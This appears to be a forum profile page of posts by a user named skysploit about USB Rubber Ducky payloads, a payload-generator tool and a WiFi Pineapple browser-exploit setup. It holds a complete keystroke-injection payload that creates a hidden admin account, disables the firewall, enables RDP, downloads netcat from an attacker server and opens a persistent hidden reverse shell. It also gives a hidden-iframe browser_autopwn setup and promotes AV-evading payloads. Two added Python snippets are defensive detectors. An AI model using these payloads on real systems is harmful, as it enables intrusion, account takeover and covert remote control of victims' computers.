skysploit
Active Members
  • Posts: 68
  • Days Won: 5

Everything posted by skysploit

  1. ~Persistence~ has been added to the Simple-Ducky Payload Generator. See the forum post below for a link to download :) ~skysploit http://forums.hak5.org/index.php?/topic/28969-release-simple-ducky-payload-generator-v14-international-key-mappingkali-linux-compatible/
  2. I have been unsuccessful at getting Windows 7 and OS X payloads to work with VirtualBox. But Windows XP, Vista, Server 2003, and all the Linux Distros I have tried work just fine. VMPlayer works great for Windows 7. I would be interested to see if anyone out there has been successful at getting VirtualBox working with Windows 7...
  3. Hello, Here's a new payload that I came up with. It targets Windows 7 w/UAC enabled. Here's what happens when you run it...
      • Opens an admin command prompt
      • Creates an admin user (default creds: hacker | mysecretpassword)
      • Disables the windows firewall
      • Enables remote desktop
      • Enables remote assistance
      • Hides the newly created admin account from the Windows Welcome Screen
      • Creates a VBScript to run a hidden instance of Netcat
      • Creates a batch file to launch Netcat (this is needed to mask an open netcat session from the desktop)
      • Downloads netcat from the attackers web server (to transfer netcat to the web directory in kali use: cp /usr/share/windows-binaries/nc.exe /var/www/nc.exe)(launch apache by using: service apache2 start)
      • Calls the VBScript to launch the hidden netcat shell
      • Creates a batch file in the startup directory that will launch the VBScript every time a user logs in (the batch file is hidden/transparent to the user while it runs)
      So here it is... I will add a fully configurable version of ~Persistence~ to the Simple-Ducky Payload Generator this weekend.
      ~skysploit

          DELAY 5000
          ESCAPE
          DELAY 300
          CONTROL ESCAPE
          DELAY 300
          STRING cmd
          DELAY 400
          MENU
          DELAY 400
          STRING a
          DELAY 600
          LEFTARROW
          DELAY 300
          ENTER
          DELAY 800
          STRING netsh firewall set opmode disable
          ENTER
          DELAY 300
          STRING net user hacker mysecretpassword /add && net localgroup administrators hacker /add
          ENTER
          DELAY 200
          STRING y
          ENTER
          DELAY 400
          STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
          ENTER
          DELAY 300
          STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
          ENTER
          DELAY 300
          STRING reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v hacker /t REG_DWORD /d 0 /f
          ENTER
          DELAY 300
          STRING copy con nc.vbs
          ENTER
          STRING Set WshShell = CreateObject("WScript.Shell")
          ENTER
          STRING WshShell.Run chr(34) & "c:\Windows\System32\nc.bat" & Chr(34), 0, false
          ENTER
          STRING Set WshShell = Nothing
          ENTER
          CTRL z
          ENTER
          STRING echo cmdow @ /hid >> nc.bat
          ENTER
          STRING echo nc -nv 172.16.1.5 4444 -e cmd.exe >> nc.bat
          ENTER
          STRING powershell (new-object System.Net.WebClient).DownloadFile('http://172.16.1.5/nc.exe,c:\Windows\system32\nc.exe');
          ENTER
          STRING cscript nc.vbs
          ENTER
          STRING cd c:\Documents And Settings\All Users\Start Menu\Programs\Startup\
          ENTER
          STRING echo cmdow @ /hid >> persistence.bat
          ENTER
          STRING echo cscript c:\Windows\System32\nc.vbs >> persistence.bat
          ENTER
          STRING exit
          ENTER
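As an added example (not part of skysploit's post or the Simple-Ducky project), a small Python reader for the Ducky Script format used above: it joins STRING tokens up to each ENTER to recover the command lines a found inject script would type, and tags lines matching a few indicators taken from this payload (account creation, hidden account, RDP/firewall changes, download cradle, startup persistence) so a defender can review a recovered payload without replaying it on a host. The sample script and the indicator list are constructed for this example.

```python
import re

# Constructed sample excerpt in the style of the payload above (not the full script).
SAMPLE = r"""DELAY 5000
STRING cmd
ENTER
STRING net user hacker mysecretpassword /add && net localgroup administrators hacker /add
ENTER
STRING reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v hacker /t REG_DWORD /d 0 /f
ENTER
STRING copy con nc.vbs
ENTER
CTRL z
ENTER
STRING exit
ENTER
"""

# Indicators a reviewer would want flagged (assumed list, extend as needed).
INDICATORS = {
    "account creation": re.compile(r"\bnet user\b.*\s/add\b", re.I),
    "admin group change": re.compile(r"\bnet localgroup administrators\b", re.I),
    "firewall disabled": re.compile(r"netsh firewall set opmode disable", re.I),
    "RDP enabled via registry": re.compile(r"fDenyTSConnections", re.I),
    "hidden account": re.compile(r"SpecialAccounts\\UserList", re.I),
    "download cradle": re.compile(r"DownloadFile\(", re.I),
    "startup persistence": re.compile(r"\\Startup\\", re.I),
}

def typed_lines(script):
    """Join consecutive STRING tokens until ENTER and return the lines the payload types.
    DELAY, modifier keys, MENU, arrow keys and so on type no visible text and are skipped."""
    lines, buf = [], ""
    for raw in script.splitlines():
        cmd, _, arg = raw.strip().partition(" ")
        if cmd == "STRING":
            buf += arg
        elif cmd == "ENTER":
            lines.append(buf)
            buf = ""
    return lines

def review(script):
    """Return (typed line, [matched indicator names]) for every line the payload types."""
    return [(line, [name for name, rx in INDICATORS.items() if rx.search(line)])
            for line in typed_lines(script)]
```

An empty typed line (as after the CTRL z that terminates copy con) is kept so the reconstruction stays faithful to the keystroke sequence.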
  4. You can download the simple-ducky payload generator. It has two different versions of the download and execute payload built in. One will yield you a User priv shell and the other an Admin priv shell. Here's the link: https://code.google.com/p/simple-ducky-payload-generator/ ~skysploit
  5. Version 1.0.2 now supports international keyboards. Please download it and try it out as I have not been able to test the payloads using international key mappings. Let me know if you have any issues getting it to run.
  6. Hello, In lieu of usbrubberducky.com being down I decided to create the Simple-Ducky Payload Generator. The simple-ducky is designed to quickly create reliable payloads and launch listeners. The Simple-Ducky currently uses version 2.6 of the duck encoder. The latest version of the Simple-Ducky supports all Debian Linux distros (i.e. Kali-Linux, Ubuntu, Linux Mint etc). The smart installer will take care of all the work for you. With the simple-ducky in a matter of seconds you can:
      * Create your evil executable (it's automatically placed in your web directory)
      * Create your inject.bin
      * Launch a listener (meterpreter or netcat)
      * Generate custom password lists
      * Crack extracted passwords
      * And so much more...
      Note: This framework was designed to work with Kali Linux out of the box (JDK update is required and included with the simple-ducky). However, it should work with other Linux distros as long as you install the required dependencies (see the wiki page for other than Kali installs).

      Installation
      Installing the simple-ducky just got even easier. Just download the install script, then copy and paste the lines below into your terminal. The install script now supports all Debian based Linux distros. Install videos are available on the Google code page: https://code.google.com/p/simple-ducky-payload-generator/
      There are now two options to install the simple ducky....
      Download the install file: https://code.google.com/p/simple-ducky-payload-generator/downloads/detail?name=installer_v1.1.1_debian.sh&can=2&q=
          root@kali:~# chmod +x installer_v1.1.1_debian.sh
          root@kali:~# ./installer_v1.1.1_debian.sh
          root@kali:~# rm installer_v1.1.1_debian.sh
      To run the program:
          root@kali:~# simple-ducky

      Change Log
      v1.1.1 Changes
      1. Added tons of new features; Shells with dbd (incredibly powerful see video below) and the Custom Payload Builder
      2. Cleaned up menu options, dependencies, and processes
      3. Made bug fixes to several payloads
      4. Replaced Netcat with Ncat
      v1.1.0 Changes
      1. Upgraded the encoder to version 2.6
      2. Made changes to the main menu
      3. Added a new payload: LM/NTLM Hash Dump from a Live System
      4. Added a new function: LM/NTLM Password Hasher
      5. Added a new tool: Site2lst Custom Wordlist Builder
      6. Upgraded the installer: Now there is just one version of the Simple-Ducky that supports all Debian distros (Tested on: Kali-Linux, Ubuntu and Linux Mint)
      v1.0.9 Changes
      1. Added a new payload subset titled "Forced Phishing & Web Attacks"
      2. Integrated: SE-Toolkit, Metasploit's Browser_Autopwn, and BurpSuite.
      3. Added Payload: Local DNS Poisoning | SE-Toolkit Java Applet Attack
      4. Added Payload: Local DNS Poisoning | Metasploit's Browser_Autopwn
      5. Added Payload: Proxy in the Middle (PiTM) | No Admin Access Needed | Burpsuite
      v1.0.8 Changes
      1. Added OSX Single User Mode Reverse Shell Payload
      2. Made minor scripting changes
      3. Changed Encoder to version 2.5
      4. Fixed bugs in the FTP Server Setup option
      5. Created a User add function for the FTP Server Setup Option
      v1.0.7 Changes
      1. Fixed command line entrance method on all Windows Vista/7 Payloads w/o UAC (Props to arzen)
      v1.0.6 Changes
      1. Created two separate versions of the simple-ducky (One for Kali-Linux and the other for Other Linux Distros)
         * The purpose for the Kali-Edition is to follow the Debian compliance that Offensive-Security established in hopes of getting the Simple-Ducky prepacked in Kali-Linux. (Fingers-Crossed)
      2. Removed the install dependencies option on the Kali-Linux version (Kali will keep these up to date)(Other-Linux version still has it)
      3. Updated the Powershell Download & Execute Payloads to provide better obfuscation (tested on fully patched windows Vista/7/8 running McAfee)
      4. Added a new function that configures the Pure-FTPD server for the user
      v1.0.5 Changes
      1. Complete Payload and Menu Revamp
      v1.0.4 Changes
      1. Added ~Persistence~ Payload
      2. Updated Menu Options
      v1.0.3 Changes
      1. Payload Update
      2. Added 64bit JDK Update Support
      3. Added initial delay function (allows you to set a custom delay for driver install time).
      4. Changed encoder version from 2.4 to 3.0
      v1.0.2 Changes
      1. International keyboard mapping added. -- Testers would be greatly appreciated.
      2. Aesthetic changes to text.
      v1.0.1 Changes
      1. Payload Update
      2. Encoder downgraded from v3.0 to v2.4 due to issues encoding the Win 7 Reverse Shell payload.

      Custom Payload Builder and DBD... Watch as we get NT\SYSTEM level privs while evading AV!
      Thanks for checking out the Simple-Ducky. Please provide any feedback and bug fixes to skyploit@gmail.com
      ~skysploit
  7. Can you post the syntax that you are using for the encoder? Have you tried running it through http://www.iducke.com/Encoder/IDE?
  8. Foxtrot, thanks for sharing... I'm going to start testing out the script. I'll have some feedback in a few days. ~skysploit
  9. I have nothing to add but great read... I was strapped to my seat the whole time :)
  10. Well who's to say that you can't setup a remote listener and have the iframe pointed to that location. Or possibly have the laptop within wireless range of the pineapple.
  11. Guys, Here's a quick script for changing your mac address. Simply run the script and enter the network card you would like to change. You will see your new mac address as well as your original mac. Enjoy! ~skysploit

          #!/bin/sh
          # This script will change your MAC address
          # Usage: ./mac-me.sh
          # Script by skysploit
          clear
          echo "What interface would you like to change. Example; eth0"
          echo ""
          read ADAPTER
          clear
          echo "Entering stealth mode "
          echo ""
          # Quote the interface name so an empty or odd answer does not break the commands
          ifconfig "$ADAPTER" down
          macchanger -r "$ADAPTER"
          ifconfig "$ADAPTER" up
          echo ""
          echo "Your MAC Address has been changed, it will reset upon reboot"
          echo "If this script failed: <apt-get install macchanger> and run as root"
  12. Though the green CSS theme is pretty slick, it doesn't match my desktop. And everyone knows how picky hackers can be.... Anyhow, here's my CSS script. Now that I have shown you mine, please show me yours. ~skysploit

          .navbar { top: 10px; min-width: 80%; background: gray; padding-left: 5px; padding-right: 5px; padding-top: 3px; padding-bottom: 3px; border-top-left-radius: 10px 10px; border-top-right-radius: 10px 10px; border-bottom-left-radius: 10px 10px; border-bottom-right-radius: 10px 10px; text-align: center; color: black; }
          .content { font-family: monospace; min-width: 700px; max-width: 700px; text-align: center; margin: 0 auto; }
          .contentTitle { text-align: left; padding-left: 10px; padding-top: 2px; padding-bottom: 2px; border-top-left-radius: 10px 10px; border-top-right-radius: 10px 10px; background: gray; font-weight: bold; font-size: 15px; color: black; }
          .contentContent { text-align: left; padding-left: 10px; padding-right: 10px; padding-top: 5px; padding-bottom: 5px; border-bottom-left-radius: 10px 10px; border-bottom-right-radius: 10px 10px; background: black; min-height: 40px; color: white; border-color: gray; border-style: solid; border-width: 1px; }
          .sidePanelLeft { position: absolute; top: 50px; text-align: left; min-width: 300px; font-family: monospace; }
          .sidePanelRight { position: absolute; right: 1%; top: 50px; text-align: left; min-width: 300px; font-family: monospace; }
          .sidePanelTitle { padding-left: 10px; padding-top: 2px; padding-bottom: 2px; border-top-left-radius: 10px 10px; border-top-right-radius: 10px 10px; background: gray; font-weight: bold; font-size: 15px; color: white; }
          .sidePanelContent { padding-left: 10px; padding-right: 10px; padding-top: 5px; padding-bottom: 5px; background: black; border-bottom-left-radius: 10px 10px; border-bottom-right-radius: 10px 10px; min-height: 40px; color: white; border-color: gray; border-style: solid; border-width: 1px; }
          .moduleTitle { padding-left: 10px; padding-top: 2px; padding-bottom: 2px; border-top-left-radius: 10px 10px; border-top-right-radius: 10px 10px; background: gray; font-weight: bold; font-size: 15px; color: white; }
          .moduleContent { padding-left: 10px; padding-right: 10px; padding-top: 5px; padding-bottom: 5px; border-bottom-left-radius: 10px 10px; border-bottom-right-radius: 10px 10px; background: black; min-height: 40px; color: white; border-color: gray; border-style: solid; border-width: 1px; }
          .modules { position: absolute; right: 20%; left: 20%; font-family: monospace; }
          .moduleContent td { border-width: 15px; border-spacing: 20px; border-style: solid; border-color: black; border-collapse: collapse; color: white; }
          body { font-family: monospace; color: white; background: black; text-align: center; }
          a { color: white; }
          input[type=text], input[type=password] { font-family: courier; border: 1px; background-color: black; color: white; border-style: dotted; }
          pre {
            white-space: pre-wrap;       /* css-3 */
            white-space: -moz-pre-wrap;  /* Mozilla, since 1999 */
            white-space: -pre-wrap;      /* Opera 4-6 */
            white-space: -o-pre-wrap;    /* Opera 7 */
            word-wrap: break-word;       /* Internet Explorer 5.5+ */
          }
  13. crepsidro, I have not personally tried to run msf on the pineapple. I don't think it has the "juice" to support it. Here's a little more info on preparing for the autopwn attack. There are multiple ways to do this; below is the way I typically set up my connections.
      • Connect the Pineapple to your ethernet port and connect your wireless card to a wireless network.
      • Using Backtrack running in a VM, connect both the wireless card and the ethernet port to the VM (yes, I pull both resources from the hosting machine to the VM).
      • Run the pineapple setup script and set your ethernet port to the default address (172.16.42.42), set the wifi adapter to the network's gateway address.
      • Open Metasploit using "msfconsole" or "msfcli" (Again use Google as a reference to help set the parameters above)
      Hope this helps. ~skysploit
  14. That's a great idea! I will have to go back and play around with the java payload. :)
  15. So, here's a simple change that could pay out big (in a pinch) on a pentest...
      How does it work? It embeds a tiny iframe (about the size of a ".") at the bottom of a spoofed webpage. Once someone browses to the site they're immediately connected to the attacking machine. Dozens of exploits are then sent back to the victim. If the attack is successful, the attacking machine will receive a meterpreter shell.
      How to set it up.
      • Add the iframe below to any/all of your spoofed sites. Example, the "facebook.html" file from Darren's "phish-pineapple.zip".
      • Open msfconsole and "use auxiliary/server/browser_autopwn"
      • Set the options below (n00b's, let Google be your guide)
      • Turn on "DNS Spoof" from the main page of the Pineapple.
      • Wait for the victim (subject/client) to browse to the site. Once a connection to the spoofed page has been initiated you will fire a tasty batch of exploits.
      Quick note with browser_autopwn (for those that have not used it): It is a very finicky auxiliary module within the msf. It will more than likely fail on a patched system (hence the purpose of pentesting). Not to mention the amount of traffic that is generated by browser_autopwn. It's always best to enumerate, find out what browsers are being used, then perform a targeted attack.
      Side note: Pentesting at Starbucks can get you put in jail... Happy (responsible) hacking! ~skysploit

      iframe (add this to the end of the script):
          <iframe SRC="http://172.16.42.42:8080/hacked" height = "0" width ="0"/>

      Settings for browser_autopwn:
          msf auxiliary(browser_autopwn) > show options

          Module options (auxiliary/server/browser_autopwn):

             Name        Current Setting  Required  Description
             ----        ---------------  --------  -----------
             LHOST       172.16.42.42     yes       The IP address to use for reverse-connect payloads
             SRVHOST     172.16.42.42     yes       The local host to listen on.
             SRVPORT     8080             yes       The local port to listen on.
             SSL         false            no        Negotiate SSL for incoming connections
             SSLCert                      no        Path to a custom SSL certificate
             SSLVersion  SSL3             no        Specify the version of SSL that should be used
             URIPATH     /hacked          no        The URI to use for this exploit (default is random)

          msf auxiliary(browser_autopwn) > exploit
          ....... (Server build process was pulled out) .......
          [*] --- Done, found 53 exploit modules
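As an added example (not from the original post), a Python scanner that walks a captured HTML page and reports iframes that are zero-size or hidden by style and whose src points at a host other than the page's own, which is how the injected iframe above would appear in a spoofed login page. The sample page, the page host and the rule that hidden same-host frames are ignored are all assumptions made for this example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

ZERO = ("0", "0px", "0%")  # sizes that make a frame invisible

class HiddenIframeFinder(HTMLParser):
    """Collect iframes that are hidden and load content from a foreign host."""
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []  # (src, reason)

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "").strip() for k, v in attrs}  # HTMLParser lowercases names
        zero_size = a.get("height") in ZERO or a.get("width") in ZERO
        style = a.get("style", "").replace(" ", "").lower()
        hidden = "display:none" in style or "visibility:hidden" in style
        src = a.get("src", "")
        src_host = (urlparse(src).hostname or "").lower()
        if (zero_size or hidden) and src_host and src_host != self.page_host:
            self.findings.append((src, "zero-size" if zero_size else "hidden-style"))

def find_hidden_iframes(html, page_host):
    """Return [(src, reason)] for suspicious iframes in the given page."""
    finder = HiddenIframeFinder(page_host)
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample: a spoofed login page with the injected iframe at the end.
SAMPLE_PAGE = """<html><body>
<form action="/login"><input type="text" name="email"></form>
<iframe src="https://www.example.com/widget" height="200" width="300"></iframe>
<iframe SRC="http://172.16.42.42:8080/hacked" height = "0" width ="0"/>
</body></html>"""

if __name__ == "__main__":
    for src, reason in find_hidden_iframes(SAMPLE_PAGE, "www.facebook.com"):
        print(f"suspicious iframe ({reason}): {src}")
```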